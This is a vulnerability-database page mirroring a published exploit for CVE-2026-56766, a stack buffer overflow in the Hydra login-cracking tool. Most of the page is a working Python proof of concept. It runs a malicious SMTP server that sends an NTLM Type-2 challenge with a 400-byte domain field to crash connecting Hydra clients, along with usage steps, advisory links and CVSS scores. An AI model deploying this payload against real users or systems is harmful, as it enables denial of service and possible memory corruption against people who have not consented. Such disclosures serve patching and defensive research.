Lucene search
K

πŸ“„ Hydra Stack Buffer Overflow

πŸ—“οΈΒ 07 Jul 2026Β 00:00:00Reported byΒ Mohammed Idrees BanyamerTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstorm.newsπŸ‘Β 8Β Views

CVE-2026-56766: Hydra stack buffer overflow in NTLM authentication from a long domain.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-56766
25 Jun 202618:01
–attackerkb
Circl
CVE-2026-56766
25 Jun 202623:34
–circl
CVE
CVE-2026-56766
25 Jun 202618:01
–cve
Cvelist
CVE-2026-56766 Hydra - Stack Buffer Overflow in NTLM Authentication Handler
25 Jun 202618:01
–cvelist
Exploit DB
Hydra - Stack Buffer Overflow
7 Jul 202600:00
–exploitdb
EUVD
EUVD-2026-39515
25 Jun 202618:01
–euvd
NVD
CVE-2026-56766
25 Jun 202619:16
–nvd
OPENSUSE Linux
hydra-9.7+git20.gbccaea1-1.1 on GA media (moderate)
28 Jun 202600:00
–opensuse
OSV
OPENSUSE-SU-2026:11131-1 hydra-9.7+git20.gbccaea1-1.1 on GA media
27 Jun 202600:00
–osv
OSV
UBUNTU-CVE-2026-56766
25 Jun 202619:16
–osv
Rows per page
# Exploit Title:    Hydra - Stack Buffer Overflow 
    # CVE:                   CVE-2026-56766
    # Date:                  2026-06-26
    # Exploit Author:        Mohammed Idrees Banyamer
    # Author Country:        Jordan
    # Instagram:             @banyamer_security
    # Author GitHub:         https://github.com/mbanyamer
    # Author Blog  :         https://banyamersecurity.com/blog/
    # Vendor Homepage:       https://github.com/vanhauser-thc/thc-hydra
    # Software Link:         https://github.com/vanhauser-thc/thc-hydra
    # Affected:              Hydra <= 9.7
    # Tested on:             Hydra 9.5 (Ubuntu 22.04)
    # Category:              Remote
    # Platform:              Linux
    # Exploit Type:          Stack Buffer Overflow
    # CVSS:                  7.5
    # Description:           Malicious NTLM Type-2 challenge with excessively long domain
    #                        causes stack buffer overflow in Hydra's NTLM authentication handler
    #                        (SMTP, POP3, IMAP, etc. modules).
    # Fixed in:              https://github.com/vanhauser-thc/thc-hydra/commit/9cc84c20e75f5fef6bb1790bb9ada2afad2204e2
    # Usage:
    #   python3 exploit.py
    #
    # Examples:
    #   python3 exploit.py
    #
    # Notes:
    #   β€’ Run this PoC server first, then launch vulnerable Hydra against it.
    #   β€’ Triggers SIGSEGV in vulnerable versions.
    #
    # How to Use
    #
    # Step 1: Run the exploit server: python3 exploit.py
    # Step 2: Run Hydra: hydra -l test -p test 127.0.0.1 smtp
    
    def banner():
        print(r"""
    β•”β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•—
    β•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘
    β•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
    β•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β•šβ–ˆβ–ˆβ•”β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
    β•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
    β•šβ•β•β•β•β•β• β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•β•   β•šβ•β•   β•šβ•β•  β•šβ•β•β•šβ•β•     β•šβ•β•β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•
            ╔═╗ Banyamer Security ╔═╗
    """)
    
    import socket
    import base64
    import struct
    import threading
    import time
    import sys
    
    NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
    NTLM_TYPE_2 = 2
    
    def create_ntlm_type2_challenge():
        challenge = bytearray(NTLMSSP_SIGNATURE)
        challenge += struct.pack("<I", NTLM_TYPE_2)
        
        domain_name = b"A" * 400
        domain_len = len(domain_name)
        
        flags = 0x00008201
        server_challenge = b"\x11\x22\x33\x44\x55\x66\x77\x88"
        reserved = b"\x00" * 8
        target_name_offset = 48
        
        challenge += struct.pack("<HHI", domain_len, domain_len, target_name_offset)
        challenge += struct.pack("<I", flags)
        challenge += server_challenge
        challenge += reserved
        challenge += b"\x00" * 8
        challenge += domain_name
        
        return challenge
    
    class SMTPServer:
        def __init__(self, host='0.0.0.0', port=2525):
            self.host = host
            self.port = port
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            
        def handle_client(self, client, addr):
            client.send(b"220 poc-smtp-server ESMTP Ready\r\n")
            
            while True:
                try:
                    data = client.recv(4096).decode('utf-8', errors='ignore').strip()
                    if not data:
                        break
                        
                    if data.upper().startswith("EHLO") or data.upper().startswith("HELO"):
                        client.send(b"250-OK\r\n250 AUTH NTLM\r\n")
                    
                    elif data.upper().startswith("AUTH NTLM"):
                        client.send(b"334 NTLM\r\n")
                        
                    elif len(data) > 10:
                        type2 = create_ntlm_type2_challenge()
                        b64_type2 = base64.b64encode(type2).decode('ascii')
                        client.send(f"334 {b64_type2}\r\n".encode())
                        
                        time.sleep(1)
                        client.recv(8192)
                        client.send(b"235 Authentication successful (fake)\r\n")
                        break
                    
                    elif data.upper().startswith("QUIT"):
                        client.send(b"221 Bye\r\n")
                        break
                    
                except:
                    break
            
            client.close()
        
        def start(self):
            self.sock.bind((self.host, self.port))
            self.sock.listen(5)
            print(f"[+] Malicious SMTP server listening on {self.host}:{self.port}")
            print("[+] Run: hydra -l test -p test 127.0.0.1 smtp")
            
            while True:
                client, addr = self.sock.accept()
                threading.Thread(target=self.handle_client, args=(client, addr), daemon=True).start()
    
    if __name__ == "__main__":
        banner()
        try:
            server = SMTPServer()
            server.start()
        except KeyboardInterrupt:
            print("\n[+] Server stopped")
        except Exception as e:
            print(f"[-] Error: {e}")

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 00:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 48.6
CVSS 3.18.8
EPSS0.00474
SSVC
8